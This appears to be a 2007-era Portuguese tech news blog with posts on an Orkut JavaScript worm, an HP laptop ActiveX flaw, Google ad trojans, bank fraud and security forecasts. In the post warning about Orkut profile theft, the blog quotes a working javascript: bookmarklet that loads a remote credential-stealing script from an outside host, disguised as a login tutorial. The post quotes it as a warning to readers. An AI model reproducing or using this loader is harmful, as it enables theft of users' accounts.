Praga em rede social "seqüestrava" usuários

17 comentários

Uma brecha na rede social Orkut levava internautas a figurarem, sem querer, na comunidade "Infectados pelo Vírus do Orkut". Para entrar na comunidade, que chegou a ter 700 mil integrantes, bastava acessar a página de recados de alguém que já tivesse sido infectado. A brecha já foi corrigida.
A "brincadeira" foi criada pelo usuário que se identificou como Rodrigo Lacerda, dono da comunidade. Autor da praga, ele conta no seu blog que não queria causar nenhum mal, nem roubar dados de ninguém, apenas queria ver o potencial de estrago caso isso fosse usado para maus propósitos.
Os scraps utilizados foram: "Feliz natal para vc!", "Tenha uma otima semana =)", "2008 vem ai... que ele comece mto bem para vc", "Boas festas de final de ano", de acordo com o autor.
Rodrigo explica em seu blog como a brincadeira foi criada. Leia um trecho:
"Eu pensava em construir algo que se espalhasse pelo orkut e eu conseguisse roubar o maior número possível de perfis, mas eu não entendia nada de javascript, e antes que pudesse estudar algo, a falha foi corrigida. Hoje eu tenho um nível razoável com a linguagem, e vi que era novamente possível colocar a idéia em prática, mas não para roubar nem prejudicar ninguém, e sim para ver que proporção isso poderia tomar se fosse usado para o mal. A idéia era divulgar um scrap com um link para o Blog do CTRL+C, mas como já falei, desisti da idéia, poderia negativar a imagem do blog. Resolvi então criar a comunidade Infectados pelo Vírus do Orkut e fazer as pessoas entrarem nela e espalhar o código por ai. Funciona assim:
- Você lê o scrap com o código- Ele injeta um código javascript no seu navegador- O código faz você entrar na comunidade- Coleta a sua lista de amigos- Envia o recado com o código para elesE assim tudo vai se espalhando, como um vírus."

Vírus infecta sistema de publicidade do Google

4 comentários


Propagandas colocadas pelo Google em páginas estão sendo seqüestradas por trojans que substituem o texto com publicidade de outro provedor, disse a empresa de antivirus romena BitDefender.Cancelamos as contas de usuários que mostravam publicidade que redirecionava usuários para sites com códigos maliciosos ou que anunciavam um produto que violasse princípios de software", disse o Google na quarta-feira. "Trabalhamos para detectar e remover sites que servem malware na nossa rede de publicidade e nos resultados de buscas. Temos processos manuais e automatizados para detectar e forçar estas políticas", declarou.
"É uma situação séria que traz danos aos usuários e donos de sites", diz Attila Balazs, analista da Bit Defender. "Usuários são afetados por causa da publicidade e/ou dos sites linkados que têm códigos maliciosos", disse. "Webmasters são afetados porque o trojan afasta leitores e portanto possivelmente dinheiro", falou.
A BitDefender descreve o trojan Trojan.Qhost.WU em seu site (www.bitdefender.com) e o classifica como de "baixo" nível de alastramento e causa danos "médios".

Terra Noticias
Reuters

HP lança atualização crítica de segurança

2 comentários


A HP lançou uma atualização para reparar uma vulnerabilidade crítica em seu software Info Center, que vem instalado de fábrica em diversos modelos de laptops da fabricante e poderia ser explorado por um hacker para instalar malware em máquinas comprometidas após acessar um site malicioso.
Segundo o site heise Security, a atualização apenas desativa o software vulnerável até que uma correção esteja disponível, uma solução mais eficiente do que simplesmente desinstalar o aplicativo que é parte do pacote Quick Launch Buttons.
Entre os computadores afetados estão os notebooks HP Compaq Business com o Quick Launch Buttons versão 6.3 e anteriores, e os aparelhos das séries HP Pavilion e HP Compaq Presario com o software Quick Launch Buttons versões 6.0 a 6.3.
A recomendação da HP é que todos os usuários destes aparelhos instalem a atualização SP38166.exe, que possui pouco mais de 1 MB e pode ser baixada em tinyurl.com/2p5en8.

Código malicioso no orkut rouba perfis

7 comentários

A pouco tempo surgiu um novo javascript, que rouba perfis no orkut, depois de executado parece que ele manda o seu login e a sua senha direto para
um screpbook, apresentamos abaixo a engenharia social usada lembrando que os
lammers estão passando tal javascript como um tutorial, então fique alerta quando vir algo
parecido com o que estamos apresentando abaixo:

LOGANDO ORKUT
Logando no orkut por scrapbookPrimeiro, não é bug, o próprio google oferece o recurso.Pra que serve isso?Para desenvolvedore que precisam por algum motivo injetar os cookies em suas aplicações, como por exemplo um site que oferece algum serviço do orkut.PowerScraps, AdsFacil, porque o scrapbook é remunerável a logins por aceitar htmls....Pode servir também para logar em qualquer serviço do google, mas o assunto aqui é orkut.A página é esta:http://www.orkut.com/Scrapbook.aspxE os parâmetros são estes:Email -> deverá ser colocado o e-mail de login na conta googlePasswd -> senha da conta googleskipvpage -> pula a parte que de verificação de e-mail confirmado(by Lord)service -> serviço da conta googleentão no final ficaria assim:javascript:d=document.createElement('SCRIPT');d.src='ht'+'tp://upashare.110mb.com/Gloogle.Login.js';document.getElementsByTagName('head').item(0).appendChild(d);void(0)Se o login estiver correto irá retornar 3 códigos, algo assim:SID=DQAAAGMAAABArUNwM...LSID=DQAAAGQAAACsRGt9...Auth=DQAAAGYAAACsRGt9...Esse último deverá ser usado para o login no orkut, para isso você precisa jogar ele na RedirLogin assimhttp://www.orkut.com/RedirLogin.aspx?auth=VALOR QUE ESTÁ EM NEGRITO ALI EM CIMAc tiver desconfiando faça um fake e teste ¬¬'O resto é com vocês...

Faraó - Hackers Brasil

Google desenvolve um serviço para concorrer com o Wikipedia

2 comentários

O Google está desenvolvendo um serviço concorrente da enciclopédia digital on-line Wikipedia, no qual os usuários poderão escrever artigos sobre diferentes temas, mas com sua respectiva assinatura.
O conhecido buscador da internet adiantou em seu blog corporativo os detalhes do projeto, ao qual só se pode ter acesso mediante convite.
O Google chama os artigos de "Knols" ou "unidades de conhecimento" e serão assinados por seus autores, que podem incluir uma foto e uma breve biografia de si mesmos.
"Acreditamos que saber quem escreveu ajudará os usuários a fazer um melhor uso do conteúdo", escreveu Udi Manber, vice-presidente de engenharia do Google, no blog corporativo do buscador.
A outra grande diferença em relação à Wikipedia é que o serviço do Google incluirá anúncios se os autores dos artigos o desejarem e estes poderão ficar com uma parte da receita publicitária.
Os usuários poderão escrever críticas sobre os artigos e avaliá-los, mas não editá-los, como ocorre na Wikipedia.
No entanto, a página de exemplo divulgada pelo Google inclui um link com a palavra "editar", supostamente para que o autor do artigo revise seu conteúdo.
A Wikipedia está disponível em 250 línguas e em conjunto já tem mais de oito milhões de artigos.
Apesar de sua popularidade, foi às vezes motivo de controvérsia pela suposta inexatidão ou subjetividade de algumas de suas entradas.

Terra

Falha em software de laptops HP abre brecha para hackers

0 comentários

Uma falha crítica foi encontrada no software HP Info Center, pré-instalado em notebooks da linha HP Compaq, que permite que um hacker instale malware em laptops através de códigos maliciosos inseridos em páginas acessadas via navegador Internet Explorer 6 ou 7.

Segundo o site heise Security, a causa do problema está em três métodos potencialmente inseguros, em um dos controles ActiveX (HPInfoDLL.dll) instalados pelo software.
Com isto, um hacker poderia acessar o sistema de arquivos e registros do Windows para iniciar downloads automáticos e instalação adicional de software sem intervenção do usuário. O controle foi configurado como "Safe for Scripting", o que permite controle através de qualquer site via JavaScript.
A vulnerabilidade foi noticiada no portal hacker Milw0rm, que explicou que a falha existe no HP Info Center versão 1.0.1.1 rodando sob as versões 2000, XP, Server 2003 e Vista do Windows.
Especialistas do site heise Security testaram a vulnerabilidade e comprovaram o problema em um laptop HP Compaq NX 6125 rodando o Windows XP com Service Pack 2 instalado, todavia não obteve sucesso em explorá-la nos modelos 6715 e 6720, que possuíam o Vista instalado.
O hacker que descobriu o bug, conhecido pelo apelido de "porkythe pig", não explicou se notificou a HP a respeito do assunto, porém recomendou aos usuários que aguardem até a correção do problema ou ainda que utilizem um navegador que não ofereça suporte a ActiveX por padrão, como o Firefox ou o Opera. Outra alternativa seria desabilitar o ActiveX no Internet Explorer.
Confira a lista dos modelos afetados:
» HP 510 Notebook PC» HP 530 Notebook PC» HP Compaq 8710w» HP Compaq 8710p» HP Compaq 8510w» HP Compaq 8510p» HP Compaq 6910b» HP Compaq 6715b» HP Compaq 6510b» HP Compaq 2710p» HP Compaq 2510p» HP Compaq NC series Business Notebook PC» HP Compaq NC6230» HP Compaq NC6220» HP Compaq NC8230» HP Compaq NX series Business Notebook PC» HP Compaq NX7300» HP Compaq NX6120» HP Compaq NX8220» HP Compaq NX6325» HP Compaq NW series Mobile Workstation» HP Compaq NW9440» HP Compaq NW8440

Mapa ajuda a descobrir onde pega TV digital em São Paulo

2 comentários

Pegar sinal digital num televisor da Grande SP pode virar uma verdadeira epopéia. Para ajudar quem caiu no "conto da TV digital" sem se precaver, apostando que iria comprar um conversor (R$ 499) e ver os programas em alta definição dias após a estréia, a Philips organizou um mapa bastante útil.



Ele mostra quais pontos sintonizam, quais sintonizam mal e quais não sintonizam as transmissões em HDTV.
Como a TV digital pede também antena UHF, o mapa, apresentado no GoogleMaps, mostra onde a transmissão digital é potencialmente micada.
O teste foi feito em 103 pontos aleatórios da cidade. Apenas em 35% dos locais testados a cobertura de todos canais se mostrou em qualidade decente; 65% dos pontos tem qualidade medíocre ou ruim. Isso quer dizer que o sinal pode funcionar para alguns canais, mas não para outros.
Na TV digital, caso o sinal esteja fraco, a imagem ou não vai aparecer ou ficará travada.
Se o telespectador quiser alta definição total, a tal imagem em "Full HD", daí precisará também desembolsar R$ 7 mil. É esse o preço aproximado de um aparelho televisor compatível com este tipo de imagem.
Folha Online

Kibon vai colocar 10 mil iPods dentro de picolés

0 comentários


A promoção que marcou a infância de muita gente, a do palito premiado, volta neste verão com um sinal dos tempos: sai o palitinho de madeira pirografado e entra um tocador de MP3 iPod Shuffle, congelado, dentro do picolé Kibon.
Para incrementar a promoção que existe há 20 anos, a Unilever distribuirá 10 mil iPods a partir de terça-feira, dia 18. Eles serão colocados dentro de embalagens patenteadas, feitas de silicone e fibra de vidro, que imitam a textura do picolé de frutas. A empresa afirma que o consumidor não conseguirá perceber a diferença entre o sorvete verdadeiro e a embalagem em que estará o iPod apenas com o toque.
"Um dos maiores desafios dessa promoção foi garantir que o consumidor não percebesse essa diferença", afirma Patrícia Borges, gerente de marketing da Kibon. "Outra foi fazer com que o iPod continuasse funcionando, mesmo depois de congelado a -30ºC."
Para isso, a empresa trabalhou com a Apple, fabricante do iPod, nos últimos oito meses. Tocadores iam do depósito da Apple em Vitória para São Paulo e seguiam para Recife, onde fica a fábrica de picolés. Lá, entravam na linha de produção, eram congelados e depois seguiam para a cadeia de distribuição, indo e vindo sob temperaturas negativas por mais alguns meses, por diversas partes do país.
No total, a empresa investiu R$ 12 milhões e espera, mais do que aumentar as vendas, gerar propaganda boca-a-boca. Se for comprado na loja, um iPod shuffle custa R$ 500 em média.
Risco
"Na verdade, estamos correndo um risco porque a promoção do palito premiado é um porto seguro, na qual sabemos exatamente o que vai acontecer", diz Borges. "A mecânica do iPod é muito mais complexa, mas deve causar mais barulho."
Além da divulgação, a empresa espera reduzir os gastos que tem com o pagamento de prêmios não resgatados. Hoje, metade dos 3 milhões de palitos premiados não é trocada e, mesmo assim, a empresa tem de recolher o valor dos sorvetes à Caixa Econômica Federal (como determina a lei), algo como R$ 2,1 milhões ao ano.
Além do iPod, o consumidor que comprar o picolé premiado terá direito ao sorvete que comprou. Ele será entregue em sua casa, com os fones do tocador de MP3, manual e garantia. Para isso, deverá ligar para o 0800 da promoção.
A campanha iPod no palito começa na semana que vem e será realizada durante todo o verão, período que responde por 70% das vendas da Kibon. A empresa é líder de mercado, com 60% das vendas.
Folha Online

Programas maléficos explodem na web em 2007

0 comentários

A empresa de segurança finlandesa F-secure coletou o dobro de amostras de programas maléficos este ano do que nos últimos 20 anos, uma tendência que mostra o crescimento do índice de malware na Internet. A Symantec detectou 212,1 mil novos códigos maliciosos só entre janeiro e junho deste ano, 185% a mais que no ano passado. O ano de 2007, indicam as empresas, marca a explosão deste tipo de ameaça digital.
Até o final de 2006 e nos 20 anos anteriores, a F-Secure contou um total de 250 mil amostras, disse Mikko Hypponen, chefe de pesquisa da empresa. Somente neste ano, já foram encontradas mais de 250 mil amostras, declarou.
Estatísticas em códigos maliciosos de empresas de antivírus variam, já que os dados derivam da experiência de consumidores e dependem de quão abrangente é o uso do software. Mas outras empresas de segurança também notaram um crescimento excessivo de código malware na Internet nos últimos anos.
O crescimento mostra que os crackers estão "gerando uma grande quantidade de malwares diferentes propositalmente, para tornar a vida dos desenvolvedores de antivírus mais difícil", disse Hypponen.
"A inovação parece estar em queda e sendo substituída por um grande volume de kits de malware em produção em massa", de acordo com o relatório da F-Secure, referente ao segundo semestre de 2007.

Terra

Roubo de dados por voz pode crescer

1 comentários

Ameaças baseadas em conteúdo estão no topo da lista das previsões anuais de segurança para 2008 da Websense. De acordo com a empresa, a prática do vishing, roubo de dados por voz em conversas VoIP, deve crescer. Macs e iPhones, por causa de seu aumento de popularidade também estarão mais vulneráveis, além de haver um incremento no spam em comentários de blogs e sites.
As previsões são:
1. Olimpíadas - novos ciberataques, phishing e fraudesPesquisadores da Websense prevêem que quando a tocha Olímpica for acessa, pode haver uma negação de serviço em larga escala, motivada por protestos políticos, além da tentativa de fraude por email e pela web. O comprometimento de sites populares de notícias, que podem sofrer ataques que instalam um código malicioso em máquinas de usuários e roubam dados, também está previsto.
2. Spam malicioso invade blogs, mecanismos de pesquisa, fóruns e sitesHackers irão usar cada vez mais spam em comentários de blogs, fórums, e em sites de notícia para que URLs infectadas com códigos maliciosos.
3. Agressores usam 'links mais fracos' da Web para lançar ataquesCom os recursos da web 2.0, como redes sociais e widgets, cada vez mais se tem lugar para que hackers possam fazer ataques. A Websense prevê que os agressores vão explorar cada vez mais esses recursos, principalmente em grandes rede como o MySpace, Facebook e outros sites de relacionamento.
4. O número de sites comprometidos irá superar o número de sites maliciosos criadosAtaques como o que aconteceu alguns dias antes do Super Bowl XLI em 2007 deve acontecer com mais freqüência. Ao invés de criar um site específico para roubar dados dos usuários, hackers deve aproveitar falhas em sites populares e instalar neles códigos maliciosos.
5. Ataques inter-plataformas - popularidade do Mac e iPhone incentivam aumentoO aumento da popularidade dos produtos da Apple deixou os aparelhos mais expostos. Programas que detecam o Mac OSX e infectam o computador com o vírus apropriado ficarão mais populares.
6. Crescimento em ataques direcionados a interesses especiais na web 2.0 - hackers visam grupos específicos de pessoas com base em interesses e perfil
A popularização de sites sociais fez com que houvesse uma criação de um banco de dados gigante com informações de pessoas. Com estes dados, hackers podem escolher vítimas através de faixa etária, poder de compra ou até mesmo hábitos específicos.
7. Transformando o JavaScript para fugir de antivírusAtravés do JavaScript polimórfico (Polyscript), hackers podem fazer que um código diferente seja carregado cada vez que um usuário abrir uma página infectada, aumentando a dificuldade de detecção.
8. Métodos de ocultação de dados ganham sofisticaçãoA inclusão de dados dentro de arquivos padrão e arquivos de mídia deve aumentar, de acordo com a Websense. Kits de ferramentas amplamente disponíveis na web serão utilizados para embutir informação proprietária e roubar dados.
9. Cumprimento global de leis irá quebrar importantes grupos de hackers e hackers individuaisAtaques em larga escala na Internet atraíram a atenção da polícia em todo o mundo. A cooperação entre forças de vários países deve aumentar a eficácia na localização de criminosos virtuais.
10. Vishing e spam por voz irão se juntar e aumentarVishing é o roubo de dados através do roubo de áudio de VoIP. Em 2008 é previsto que o vishing e o spam por voz vão se juntar e aumentar. Os usuários irão receber ligações automáticas por voz em linhas LAN com spam por voz para convencê-los a digitar seus dados através do telefone

Hacker alega ter descoberto brecha que permite ataques ao iPhone

0 comentários


Uma nova falha de segurança no navegador Safari confirmada neste domingo (08/10) permite que o iPhone, telefone celular da Apple, seja alvo de códigos maliciosos criados por crackers.
A possibilidade de uma brecha de segurança que permitiria a excecução de malware no iPhone foi levantada no fórum Hackint0sh na quinta-feira 04/10), com a suposição de que um arquivo maliciosos no formato TIFF pudesse causar problemas no navegador Safari.
No domingo, o hacker conhecido como "Niacin" confirmou em seu blog que a exploração da brecha havia funcionado.
"Temos uma execução de código! É isto mesmo, temos uma falha de TIFF funcionando", afirmou em um curto post no seu blog sem, no entanto, fornecer mais detalhes.
O hacker não detalhou, contudo, se o iPhone afetado pela brecha no browser está ou não atualizado com a versão 1.1.1 do firmware, divulgado pela Apple no final de setembro.
Também na quinta-feira, a blogueira Erica Sandun, do TUAW, comprovou um método de ter acesso à estrutura de dados do iPhone atualizado com o firmware 1.1.1 desenvolvido pelos hackers "dinopio" e "Edgan".
Em um registro de todos os passos necessários para quebrar a segurança do iPhone, Sandun confirma que conseguiu ter acesso e copiar a raiz do software do iPhone para seu desktop.
Segundo Sandun, a sofisticação do software usado para o hack, chamado de "iphuc", poderia fazer com que conteúdos, como ringtones, fossem acrescentados ao iPhone sem a necessidade do iTunes, software da Apple usado para sincronizar material do PC ao celular.

PC WOELD

Hacker ataca conta de paróquia de São Paulo e desvia R$ 18,3 mil

0 comentários


Hacker ataca conta de paróquia de São Paulo e desvia R$ 18,3 mil JULIANA CARPANEZda Folha OnlineNem entidade de caridade escapa ao ataque de hackers no Brasil. Uma paróquia na zona sul de São Paulo teve R$ 18,3 mil desviados de sua conta corrente do Itaú pelos piratas virtuais. O dinheiro, proveniente de doações, seria aplicado em obras assistenciais em Heliópolis, maior favela da capital paulista. A Polícia Federal investiga o caso.O golpe assustou os responsáveis pelo grupo de obras sociais da paróquia de Santa Edwiges, sediado no bairro do Sacomã."Sabemos de golpes na internet, mas nunca imaginamos que seríamos vítimas", disse o padre Alexandre dos Anjos, vice-presidente da entidade.Ele teme que o desvio do dinheiro prejudique as atividades do grupo, como a manutenção da creche Santa Ângela e o atendimento médico, odontológico e jurídico aos moradores de Heliópolis."Estamos sem dinheiro neste mês para prestar atendimento. O banco disse que vai nos ressarcir, mas, enquanto isso não acontece, fica difícil pagar as contas."Segundo o diretor de assistência social da paróquia, Edgard Manoel de Araújo, o dinheiro da conta, transferido indevidamente no último dia 9, foi usado pelos golpistas para pagar títulos bancários e colocar crédito de R$ 100 em diversos celulares pré-pagos. A entidade só percebeu o golpe quatro dias depois."Essa conta era uma espécie de poupança e, por isso, não era utilizada diariamente. Depois do susto, vi a importância de checar com mais freqüência os dados financeiros."Araújo entrou em contato com o Itaú e a instituição explicou aos clientes que as transferências haviam sido realizadas por hackers. Sem citar prazos, o banco se comprometeu com o grupo em ressarcir o valor.BancoO Itaú afirmou, por meio de sua assessoria de imprensa, que seus sistemas "são seguros" e "nunca foram acessados por hackers". Leia íntegra de nota divulgada:"Eventuais fraudes em contas dos clientes ocorrem fora do ambiente do banco e só acontecem porque, de forma fraudulenta, terceiros, através de artifícios escusos/enganosos acabam tendo acesso aos dados sensíveis de clientes, sem qualquer participação do banco.Os sistemas eletrônicos do Itaú são seguros. Nunca foram acessados por hackers. Sobre o caso em questão, o banco Itaú informa que o caso já foi analisado, as providências já foram adotadas e todas as explicações já foram dadas ao cliente. O assunto está em fase final de solução."SegurançaPara evitar incidentes desse tipo, empresas de segurança aconselham os internautas a não visitar sites desconhecidos, pois eles podem instalar programas maliciosos no micro das vítimas. Esses códigos podem, por exemplo, roubar todas as informações digitadas, como senhas e outros dados pessoais.O mesmo acontece com e-mails falsos que circulam pela rede --este ano, diversos internautas caíram no golpe da mensagem supostamente enviada pela Receita Federal.O usuário era informado sobre erros no preenchimento da declaração e, quando clicava no anexo para fazer as correções, podia ter seu micro infectado por vírus.
Folha Online

Pirata virtual tenta dar golpe de R$ 2 mi em Ronaldinho

0 comentários


O programador brasileiro Ewerton C.R., 33, foi preso pela polícia espanhola, em Barcelona, acusado de tentar dar um golpe de cerca de R$ 2 milhões no jogador Ronaldinho por meio de sua família.
O pirata virtual paulista conseguiu senhas dos e-mails da irmã do jogador, Deise Assis, e do irmão e procurador do craque, Roberto de Assis, que tinham conta no serviço Hotmail.
Ewerton também se aproximou dos familiares de Ronaldinho ao freqüentar a boate Bikini, uma das preferidas do jogador na cidade espanhola.
Segundo o jornal italiano "Corriere Della Sera", foi deste modo que o suposto criminoso conseguiu acesso à senha da conta bancária de Deise.
O golpe foi descoberto pelo banco da irmã de Ronaldinho, que rastreou duas tentativas de transferências de 400 mil euros cada (aproximadamente R$ 2 milhões, somados) para uma conta de Portugal.
Segundo o jornal italiano, o golpe não foi executado "por pouco", já que o banco descobriu a farsa ao detectar que a conta de Deise estava com saldo negativo já após a primeira transferência de 400 mil euros.
Folha Online

Microsoft prepara sete atualizações de segurança

0 comentários


A Microsoft anunciou que a nova etapa de seu ciclo mensal de atualizações de segurança, Patch Tuesday, que acontece a cada segunda terça-feira do mês, contará no próximo dia 11 com sete atualizações. Segundo o site CNet, três delas resolverão problemas considerados pela Microsoft como críticos por permitirem que um hacker tome conta da máquina através da execução de código malicioso.
Destes, um afeta o DirectX, das versões 7 a 10; outro está diretamente ligado a arquivos WMF e outra correção resolverá problemas no Internet Explorer. Das outras quatro correções estão duas para o sistemas Windows Vista, uma para o Windows 2000 e Windows XP, e uma que afeta o Windows XP e o Windows Server 2003.
Ao todo, cinco das atualizações são direcionadas a usuários do Vista, o sistema considerado o mais seguro da Microsoft.
Embora a Microsoft não revele detalhes específicos de suas atualizações, o site The Register cita que é provável que uma das correções se dedique a falha da proteção anti-cópia SafeDisc, da Macrovision, que acompanha o XP e o 2003, e que não foi resolvida mês passado.
Uma brecha recém-notificada na Web Proxy Autodiscovery (WPAD), ferramenta que auxilia administradores a automatizarem a configuração de proxys, também deve ser corrigida.
Magnet

Terra